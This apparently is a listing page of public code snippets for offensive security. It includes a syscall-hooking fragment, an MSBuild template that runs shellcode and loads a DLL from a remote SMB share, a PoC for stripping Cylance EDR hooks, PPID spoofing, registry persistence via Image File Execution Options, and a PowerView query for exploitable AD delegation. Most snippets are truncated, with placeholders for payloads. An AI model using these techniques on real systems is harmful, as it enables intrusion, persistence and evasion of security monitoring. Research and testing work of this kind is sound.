sdcampbell / nessus_http_parser.rb

Last active August 4, 2021 21:01

Extracts HTTP hosts and ports from a Nessus file and saves to files to be used with Aquatone

	#!/usr/bin/ruby
	require 'ruby-nessus'
	require 'set'

	file = ARGV[0]

	if ARGV.length == 0
	raise "Usage: #{$0} /path/to/file.nessus"
	end

GoldenOak / syscall_hooking.c

Created February 1, 2020 13:44

Snippet of system call hooking for the Linux kernel

	/*
	* This is not a whole code, but only a snippet.
	* Some functions is missing.
	*/

	asmlinkage long (*orig_shutdown)(int, int);
	unsigned long *sys_call_table;

	hooking_syscall(void hook_addr, uint16_t syscall_offset, unsigned long sys_call_tabe)
	{

rvrsh3ll / msbuild_inline_task_parent_process_spoof.txt

Last active August 2, 2021 20:00

	<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="MyTarget">
	<SimpleTask MyProperty="My voice is my passport."
	MyCode='<base64 encoded x64 shellcode>'
	MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
	</Target>
	<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
	</Project>

qgrosperrin / poc.c

Created January 14, 2020 15:49

	#include <iostream>
	#include <windows.h>
	unsigned char buf[] =
	"SHELLCODE_GOES_HERE";
	struct syscall_table {
	int osVersion;
	};
	// Remove Cylance hook from DLL export
	void removeCylanceHook(const char dll, const char apiName, char code) {
	DWORD old, newOld;

rvrsh3ll / PPID Spoof & BlockDLLs

Created January 14, 2020 02:07 — forked from rasta-mouse/PPID Spoof & BlockDLLs

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;

	namespace BlockDllTest
	{
	class Program
	{
	static void Main(string[] args)
	{

rasta-mouse / PPID Spoof & BlockDLLs

Last active April 1, 2025 22:39

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;

	namespace BlockDllTest
	{
	class Program
	{
	static void Main(string[] args)
	{

MSAdministrator / iranian_apit_groups_possible_commands.md

Last active December 6, 2024 08:14

Iranian APT Groups & Possible Commands Used By These Groups

Overview

The following content is generated using a preview release of Swimlane's pyattck.

This snippet of data is scoped to the following actor groups:

netbiosX / ImageFileExecutionOptions.ps1

Last active June 14, 2024 09:22

Image File Execution Options Injection - Persistence Technique

	<#
	ImageFileExecutionOptions v1.0
	License: GPLv3
	Author: @netbiosX
	#>
	# Image File Execution Options Injection Persistence Technique
	# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/

	function Persist-Debugger

kmcquade / AWS API calls that return credentials.md

Last active March 24, 2025 11:22

AWS API calls that return credentials

FatRodzianko / Get-RBCD.ps1

Created December 18, 2019 21:14

Use Powerview to find resource-based constrained delegation (RBCD) in active directory

	# Get all sids, all computer object ACLs, and find RBCD!!!
	$usersid = get-domainuser \| select -exp objectsid; "Got user SIDS"; $computeracls = Get-DomainComputer \| select -exp dnshostname \| get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $usersid) { $acl \| ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like 'GenericAll' -or $_.ActiveDirectoryRights -Like 'GenericWrite' -or $_.ActiveDirectoryRights -Like 'WriteOwner')} } }

	# Get all SIDS, all computer object ACLs, and find RBCD
	$groupsid = $groups = Get-DomainGroup \| Where-Object {$_.SamAccountName -ne "Domain Admins" -and $_.SamAccountName -ne "Account Operators" -and $_.SamAccountName -ne "Enterprise Admins" -and $_.SamAccountName -ne "Administrators" -and $_.SamAccountName -ne "DnsAdmins" -and $_.SamAccountName -ne "Schema Admins" -and $_.SamAccountName -ne "Key Admins" -and $_.SamAccountName -ne "Enterprise Key Admins" -and $_.SamAccountName -ne "Storage

AA-2020743